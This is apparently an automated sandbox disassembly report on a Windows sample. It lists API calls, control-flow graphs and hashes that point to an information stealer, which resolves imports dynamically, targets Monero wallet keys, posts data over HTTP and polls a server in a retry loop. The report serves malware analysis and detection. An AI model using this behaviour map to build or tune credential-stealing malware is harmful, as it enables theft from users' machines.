                                      control_flow_graph 633 f29f20-f29f2a 634 f29f30-f2a341 GetProcAddress * 43 633->634 635 f2a346-f2a3da LoadLibraryA * 8 633->635 634->635 636 f2a456-f2a45d 635->636 637 f2a3dc-f2a451 GetProcAddress * 5 635->637 638 f2a463-f2a521 GetProcAddress * 8 636->638 639 f2a526-f2a52d 636->639 637->636 638->639 640 f2a5a8-f2a5af 639->640 641 f2a52f-f2a5a3 GetProcAddress * 5 639->641 642 f2a647-f2a64e 640->642 643 f2a5b5-f2a642 GetProcAddress * 6 640->643 641->640 644 f2a654-f2a72a GetProcAddress * 9 642->644 645 f2a72f-f2a736 642->645 643->642 644->645 646 f2a7b2-f2a7b9 645->646 647 f2a738-f2a7ad GetProcAddress * 5 645->647 648 f2a7bb-f2a7e7 GetProcAddress * 2 646->648 649 f2a7ec-f2a7f3 646->649 647->646 648->649 650 f2a825-f2a82c 649->650 651 f2a7f5-f2a820 GetProcAddress * 2 649->651 652 f2a922-f2a929 650->652 653 f2a832-f2a91d GetProcAddress * 10 650->653 651->650 654 f2a92b-f2a988 GetProcAddress * 4 652->654 655 f2a98d-f2a994 652->655 653->652 654->655 656 f2a996-f2a9a9 GetProcAddress 655->656 657 f2a9ae-f2a9b5 655->657 656->657 658 f2a9b7-f2aa13 GetProcAddress * 4 657->658 659 f2aa18-f2aa19 657->659 658->659
                                      APIs
                                      • GetProcAddress.KERNEL32(74DD0000,01D757B0), ref: 00F29F3D
                                      • GetProcAddress.KERNEL32(74DD0000,01D757D0), ref: 00F29F55
                                      • GetProcAddress.KERNEL32(74DD0000,01D894F0), ref: 00F29F6E
                                      • GetProcAddress.KERNEL32(74DD0000,01D89400), ref: 00F29F86
                                      • GetProcAddress.KERNEL32(74DD0000,01D893D0), ref: 00F29F9E
                                      • GetProcAddress.KERNEL32(74DD0000,01D89538), ref: 00F29FB7
                                      • GetProcAddress.KERNEL32(74DD0000,01D7B9A0), ref: 00F29FCF
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CFA8), ref: 00F29FE7
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CEA0), ref: 00F2A000
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D050), ref: 00F2A018
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D068), ref: 00F2A030
                                      • GetProcAddress.KERNEL32(74DD0000,01D75970), ref: 00F2A049
                                      • GetProcAddress.KERNEL32(74DD0000,01D75830), ref: 00F2A061
                                      • GetProcAddress.KERNEL32(74DD0000,01D75910), ref: 00F2A079
                                      • GetProcAddress.KERNEL32(74DD0000,01D75A10), ref: 00F2A092
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CEE8), ref: 00F2A0AA
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE58), ref: 00F2A0C2
                                      • GetProcAddress.KERNEL32(74DD0000,01D7B888), ref: 00F2A0DB
                                      • GetProcAddress.KERNEL32(74DD0000,01D75A90), ref: 00F2A0F3
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF00), ref: 00F2A10B
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D080), ref: 00F2A124
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CEB8), ref: 00F2A13C
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF90), ref: 00F2A154
                                      • GetProcAddress.KERNEL32(74DD0000,01D75950), ref: 00F2A16D
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE70), ref: 00F2A185
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF18), ref: 00F2A19D
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF30), ref: 00F2A1B6
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE10), ref: 00F2A1CE
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE28), ref: 00F2A1E6
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF60), ref: 00F2A1FF
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CFD8), ref: 00F2A217
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE88), ref: 00F2A22F
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CED0), ref: 00F2A248
                                      • GetProcAddress.KERNEL32(74DD0000,01D8A4B0), ref: 00F2A260
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CE40), ref: 00F2A278
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D008), ref: 00F2A291
                                      • GetProcAddress.KERNEL32(74DD0000,01D75990), ref: 00F2A2A9
                                      • GetProcAddress.KERNEL32(74DD0000,01D8D0E0), ref: 00F2A2C1
                                      • GetProcAddress.KERNEL32(74DD0000,01D75850), ref: 00F2A2DA
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CF48), ref: 00F2A2F2
                                      • GetProcAddress.KERNEL32(74DD0000,01D8CFF0), ref: 00F2A30A
                                      • GetProcAddress.KERNEL32(74DD0000,01D759B0), ref: 00F2A323
                                      • GetProcAddress.KERNEL32(74DD0000,01D75C90), ref: 00F2A33B
                                      • LoadLibraryA.KERNEL32(01D8CF78,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A34D
                                      • LoadLibraryA.KERNEL32(01D8D098,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A35E
                                      • LoadLibraryA.KERNEL32(01D8CFC0,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A370
                                      • LoadLibraryA.KERNEL32(01D8D020,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A382
                                      • LoadLibraryA.KERNEL32(01D8D038,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A393
                                      • LoadLibraryA.KERNEL32(01D8D0B0,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A3A5
                                      • LoadLibraryA.KERNEL32(01D8CDF8,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A3B7
                                      • LoadLibraryA.KERNEL32(01D8D0C8,?,00F25EF3,00F30AEB,?,?,?,?,?,?,?,?,?,?,00F30AEA,00F30AE7), ref: 00F2A3C8
                                      • GetProcAddress.KERNEL32(75290000,01D75E30), ref: 00F2A3EA
                                      • GetProcAddress.KERNEL32(75290000,01D8D338), ref: 00F2A402
                                      • GetProcAddress.KERNEL32(75290000,01D892C8), ref: 00F2A41A
                                      • GetProcAddress.KERNEL32(75290000,01D8D158), ref: 00F2A433
                                      • GetProcAddress.KERNEL32(75290000,01D75B30), ref: 00F2A44B
                                      • GetProcAddress.KERNEL32(73440000,01D7B928), ref: 00F2A470
                                      • GetProcAddress.KERNEL32(73440000,01D75CB0), ref: 00F2A489
                                      • GetProcAddress.KERNEL32(73440000,01D7B6D0), ref: 00F2A4A1
                                      • GetProcAddress.KERNEL32(73440000,01D8D1D0), ref: 00F2A4B9
                                      • GetProcAddress.KERNEL32(73440000,01D8D128), ref: 00F2A4D2
                                      • GetProcAddress.KERNEL32(73440000,01D75B70), ref: 00F2A4EA
                                      • GetProcAddress.KERNEL32(73440000,01D75C70), ref: 00F2A502
                                      • GetProcAddress.KERNEL32(73440000,01D8D350), ref: 00F2A51B
                                      • GetProcAddress.KERNEL32(752C0000,01D75B10), ref: 00F2A53C
                                      • GetProcAddress.KERNEL32(752C0000,01D75C10), ref: 00F2A554
                                      • GetProcAddress.KERNEL32(752C0000,01D8D3E0), ref: 00F2A56D
                                      • GetProcAddress.KERNEL32(752C0000,01D8D3B0), ref: 00F2A585
                                      • GetProcAddress.KERNEL32(752C0000,01D75DF0), ref: 00F2A59D
                                      • GetProcAddress.KERNEL32(74EC0000,01D7B680), ref: 00F2A5C3
                                      • GetProcAddress.KERNEL32(74EC0000,01D7B8B0), ref: 00F2A5DB
                                      • GetProcAddress.KERNEL32(74EC0000,01D8D3C8), ref: 00F2A5F3
                                      • GetProcAddress.KERNEL32(74EC0000,01D75BD0), ref: 00F2A60C
                                      • GetProcAddress.KERNEL32(74EC0000,01D75E50), ref: 00F2A624
                                      • GetProcAddress.KERNEL32(74EC0000,01D7B6A8), ref: 00F2A63C
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D218), ref: 00F2A662
                                      • GetProcAddress.KERNEL32(75BD0000,01D75C50), ref: 00F2A67A
                                      • GetProcAddress.KERNEL32(75BD0000,01D891D8), ref: 00F2A692
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D170), ref: 00F2A6AB
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D0F8), ref: 00F2A6C3
                                      • GetProcAddress.KERNEL32(75BD0000,01D75D70), ref: 00F2A6DB
                                      • GetProcAddress.KERNEL32(75BD0000,01D75DD0), ref: 00F2A6F4
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D110), ref: 00F2A70C
                                      • GetProcAddress.KERNEL32(75BD0000,01D8D1E8), ref: 00F2A724
                                      • GetProcAddress.KERNEL32(75A70000,01D75AD0), ref: 00F2A746
                                      • GetProcAddress.KERNEL32(75A70000,01D8D188), ref: 00F2A75E
                                      • GetProcAddress.KERNEL32(75A70000,01D8D200), ref: 00F2A776
                                      • GetProcAddress.KERNEL32(75A70000,01D8D260), ref: 00F2A78F
                                      • GetProcAddress.KERNEL32(75A70000,01D8D1A0), ref: 00F2A7A7
                                      • GetProcAddress.KERNEL32(75450000,01D75C30), ref: 00F2A7C8
                                      • GetProcAddress.KERNEL32(75450000,01D75CD0), ref: 00F2A7E1
                                      • GetProcAddress.KERNEL32(75DA0000,01D75B50), ref: 00F2A802
                                      • GetProcAddress.KERNEL32(75DA0000,01D8D1B8), ref: 00F2A81A
                                      • GetProcAddress.KERNEL32(6F070000,01D75BF0), ref: 00F2A840
                                      • GetProcAddress.KERNEL32(6F070000,01D75CF0), ref: 00F2A858
                                      • GetProcAddress.KERNEL32(6F070000,01D75D10), ref: 00F2A870
                                      • GetProcAddress.KERNEL32(6F070000,01D8D2F0), ref: 00F2A889
                                      • GetProcAddress.KERNEL32(6F070000,01D75B90), ref: 00F2A8A1
                                      • GetProcAddress.KERNEL32(6F070000,01D75E10), ref: 00F2A8B9
                                      • GetProcAddress.KERNEL32(6F070000,01D75BB0), ref: 00F2A8D2
                                      • GetProcAddress.KERNEL32(6F070000,01D75D30), ref: 00F2A8EA
                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00F2A901
                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00F2A917
                                      • GetProcAddress.KERNEL32(75AF0000,01D8D140), ref: 00F2A939
                                      • GetProcAddress.KERNEL32(75AF0000,01D89188), ref: 00F2A951
                                      • GetProcAddress.KERNEL32(75AF0000,01D8D380), ref: 00F2A969
                                      • GetProcAddress.KERNEL32(75AF0000,01D8D278), ref: 00F2A982
                                      • GetProcAddress.KERNEL32(75D90000,01D75D50), ref: 00F2A9A3
                                      • GetProcAddress.KERNEL32(6E360000,01D8D398), ref: 00F2A9C4
                                      • GetProcAddress.KERNEL32(6E360000,01D75AF0), ref: 00F2A9DD
                                      • GetProcAddress.KERNEL32(6E360000,01D8D320), ref: 00F2A9F5
                                      • GetProcAddress.KERNEL32(6E360000,01D8D230), ref: 00F2AA0D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                      • API String ID: 2238633743-1775429166
                                      • Opcode ID: 5dc43e0754e790e8069ebc291053a045f96e7be608f06259ee8e52d075a8d55b
                                      • Instruction ID: d6fbe181284ae832b6d89baeb6d0963d9bf288cb187d3aa5b950cf59f249e1d5
                                      • Opcode Fuzzy Hash: 5dc43e0754e790e8069ebc291053a045f96e7be608f06259ee8e52d075a8d55b
                                      • Instruction Fuzzy Hash: 226240B55002019FE36CDFE8F88895677EAF75D701740893AF92ACB298D635A5C1CBA0
                                      Function 00F148D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 801 f148d0-f14992 call f2aab0 call f14800 call f2aa50 * 5 InternetOpenA StrCmpCA 816 f14994 801->816 817 f1499b-f1499f 801->817 816->817 818 f149a5-f14b1d call f28cf0 call f2ac30 call f2abb0 call f2ab10 * 2 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2ac30 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2ac30 call f2abb0 call f2ab10 * 2 InternetConnectA 817->818 819 f14f1b-f14f43 InternetCloseHandle call f2ade0 call f1a210 817->819 818->819 905 f14b23-f14b27 818->905 829 f14f82-f14ff2 call f28b20 * 2 call f2aab0 call f2ab10 * 8 819->829 830 f14f45-f14f7d call f2ab30 call f2acc0 call f2abb0 call f2ab10 819->830 830->829 906 f14b35 905->906 907 f14b29-f14b33 905->907 908 f14b3f-f14b72 HttpOpenRequestA 906->908 907->908 909 f14b78-f14e78 call f2acc0 call f2abb0 call f2ab10 call f2ac30 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2ac30 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2ac30 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2acc0 call f2abb0 call f2ab10 call f2ac30 call f2abb0 call f2ab10 call f2aa50 call f2ac30 * 2 call f2abb0 call f2ab10 * 2 call f2ade0 lstrlen call f2ade0 * 2 lstrlen call f2ade0 HttpSendRequestA 908->909 910 f14f0e-f14f15 InternetCloseHandle 908->910 1021 f14e82-f14eac InternetReadFile 909->1021 910->819 1022 f14eb7-f14f09 InternetCloseHandle call f2ab10 1021->1022 1023 f14eae-f14eb5 1021->1023 1022->910 1023->1022 1024 f14eb9-f14ef7 call f2acc0 call f2abb0 call f2ab10 1023->1024 1024->1021
                                      APIs
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F14889
                                        • Part of subcall function 00F14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F14899
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F14965
                                      • StrCmpCA.SHLWAPI(?,01D8E958), ref: 00F1498A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F14B0A
                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00F30DDE,00000000,?,?,00000000,?,",00000000,?,01D8EB08), ref: 00F14E38
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F14E54
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F14E68
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00F14E99
                                      • InternetCloseHandle.WININET(00000000), ref: 00F14EFD
                                      • InternetCloseHandle.WININET(00000000), ref: 00F14F15
                                      • HttpOpenRequestA.WININET(00000000,01D8EA38,?,01D8E3C8,00000000,00000000,00400100,00000000), ref: 00F14B65
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00F14F1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: f683464fe5ce714280f4ff52e660d016e2585e51c2412c3364738cbc93cdf460
                                      • Instruction ID: 67cf51593731c5632bc985ba10e2de40fdba8e8d6ab0cbb2432fba09b09a0c34
                                      • Opcode Fuzzy Hash: f683464fe5ce714280f4ff52e660d016e2585e51c2412c3364738cbc93cdf460
                                      • Instruction Fuzzy Hash: 1212FC72911128ABCB19EB90ED62FEEB379BF54300F504599F10672091DF786B88DF62
                                      Function 00F25760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1090 f25760-f257c7 call f25d20 call f2ab30 * 3 call f2aa50 * 4 1106 f257cc-f257d3 1090->1106 1107 f25827-f2589c call f2aa50 * 2 call f11590 call f25510 call f2abb0 call f2ab10 call f2ade0 StrCmpCA 1106->1107 1108 f257d5-f25806 call f2ab30 call f2aab0 call f11590 call f25440 1106->1108 1134 f258e3-f258f9 call f2ade0 StrCmpCA 1107->1134 1138 f2589e-f258de call f2aab0 call f11590 call f25440 call f2abb0 call f2ab10 1107->1138 1124 f2580b-f25822 call f2abb0 call f2ab10 1108->1124 1124->1134 1139 f258ff-f25906 1134->1139 1140 f25a2c-f25a94 call f2abb0 call f2ab30 * 2 call f116b0 call f2ab10 * 4 call f11670 call f11550 1134->1140 1138->1134 1144 f25a2a-f25aaf call f2ade0 StrCmpCA 1139->1144 1145 f2590c-f25913 1139->1145 1270 f25d13-f25d16 1140->1270 1164 f25be1-f25c49 call f2abb0 call f2ab30 * 2 call f116b0 call f2ab10 * 4 call f11670 call f11550 1144->1164 1165 f25ab5-f25abc 1144->1165 1149 f25915-f25969 call f2ab30 call f2aab0 call f11590 call f25440 call f2abb0 call f2ab10 1145->1149 1150 f2596e-f259e3 call f2aa50 * 2 call f11590 call f25510 call f2abb0 call f2ab10 call f2ade0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 f259e5-f25a25 call f2aab0 call f11590 call f25440 call f2abb0 call f2ab10 1150->1250 1164->1270 1171 f25ac2-f25ac9 1165->1171 1172 f25bdf-f25c64 call f2ade0 StrCmpCA 1165->1172 1179 f25b23-f25b98 call f2aa50 * 2 call f11590 call f25510 call f2abb0 call f2ab10 call f2ade0 StrCmpCA 1171->1179 1180 f25acb-f25b1e call f2ab30 call f2aab0 call f11590 call f25440 call f2abb0 call f2ab10 1171->1180 1201 f25c66-f25c71 Sleep 1172->1201 1202 f25c78-f25ce1 call f2abb0 call f2ab30 * 2 call f116b0 call f2ab10 * 4 call f11670 call f11550 1172->1202 1179->1172 1275 f25b9a-f25bda call f2aab0 call f11590 call f25440 call f2abb0 call f2ab10 1179->1275 1180->1172 1201->1106 1202->1270 1250->1144 1275->1172
                                      APIs
                                        • Part of subcall function 00F2AB30: lstrlen.KERNEL32(00F14F55,?,?,00F14F55,00F30DDF), ref: 00F2AB3B
                                        • Part of subcall function 00F2AB30: lstrcpy.KERNEL32(00F30DDF,00000000), ref: 00F2AB95
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F258F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25AA7
                                        • Part of subcall function 00F2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F2AAF6
                                        • Part of subcall function 00F25440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25478
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                        • Part of subcall function 00F25510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25568
                                        • Part of subcall function 00F25510: lstrlen.KERNEL32(00000000), ref: 00F2557F
                                        • Part of subcall function 00F25510: StrStrA.SHLWAPI(00000000,00000000), ref: 00F255B4
                                        • Part of subcall function 00F25510: lstrlen.KERNEL32(00000000), ref: 00F255D3
                                        • Part of subcall function 00F25510: lstrlen.KERNEL32(00000000), ref: 00F255FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F259DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F25B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F25C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00F25C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: 11e853fbbdfa34a53bae32a8caa2bbada5f0bdf6885ffe1b8a37bf9cbaf5feec
                                      • Instruction ID: 152a1b05d6309bd01aaa09090464215037847d92699d8e164508e169713ac9ad
                                      • Opcode Fuzzy Hash: 11e853fbbdfa34a53bae32a8caa2bbada5f0bdf6885ffe1b8a37bf9cbaf5feec
                                      • Instruction Fuzzy Hash: E4E124729101149BCB18FBE0FD63AED737DBF94700F408568F51666095EF386A48EB62
                                      Function 00F219F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1301 f219f0-f21a1d call f2ade0 StrCmpCA 1304 f21a27-f21a41 call f2ade0 1301->1304 1305 f21a1f-f21a21 ExitProcess 1301->1305 1309 f21a44-f21a48 1304->1309 1310 f21c12-f21c1d call f2ab10 1309->1310 1311 f21a4e-f21a61 1309->1311 1313 f21a67-f21a6a 1311->1313 1314 f21bee-f21c0d 1311->1314 1315 f21a71-f21a80 call f2ab30 1313->1315 1316 f21a99-f21aa8 call f2ab30 1313->1316 1317 f21b1f-f21b30 StrCmpCA 1313->1317 1318 f21bdf-f21be9 call f2ab30 1313->1318 1319 f21afd-f21b0e StrCmpCA 1313->1319 1320 f21b82-f21b93 StrCmpCA 1313->1320 1321 f21b63-f21b74 StrCmpCA 1313->1321 1322 f21bc0-f21bd1 StrCmpCA 1313->1322 1323 f21b41-f21b52 StrCmpCA 1313->1323 1324 f21ba1-f21bb2 StrCmpCA 1313->1324 1325 f21a85-f21a94 call f2ab30 1313->1325 1326 f21acf-f21ae0 StrCmpCA 1313->1326 1327 f21aad-f21abe StrCmpCA 1313->1327 1314->1309 1315->1314 1316->1314 1331 f21b32-f21b35 1317->1331 1332 f21b3c 1317->1332 1318->1314 1329 f21b10-f21b13 1319->1329 1330 f21b1a 1319->1330 1337 f21b95-f21b98 1320->1337 1338 f21b9f 1320->1338 1335 f21b80 1321->1335 1336 f21b76-f21b79 1321->1336 1342 f21bd3-f21bd6 1322->1342 1343 f21bdd 1322->1343 1333 f21b54-f21b57 1323->1333 1334 f21b5e 1323->1334 1339 f21bb4-f21bb7 1324->1339 1340 f21bbe 1324->1340 1325->1314 1350 f21ae2-f21aec 1326->1350 1351 f21aee-f21af1 1326->1351 1348 f21ac0-f21ac3 1327->1348 1349 f21aca 1327->1349 1329->1330 1330->1314 1331->1332 1332->1314 1333->1334 1334->1314 1335->1314 1336->1335 1337->1338 1338->1314 1339->1340 1340->1314 1342->1343 1343->1314 1348->1349 1349->1314 1355 f21af8 1350->1355 1351->1355 1355->1314
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00F21A15
                                      • ExitProcess.KERNEL32 ref: 00F21A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
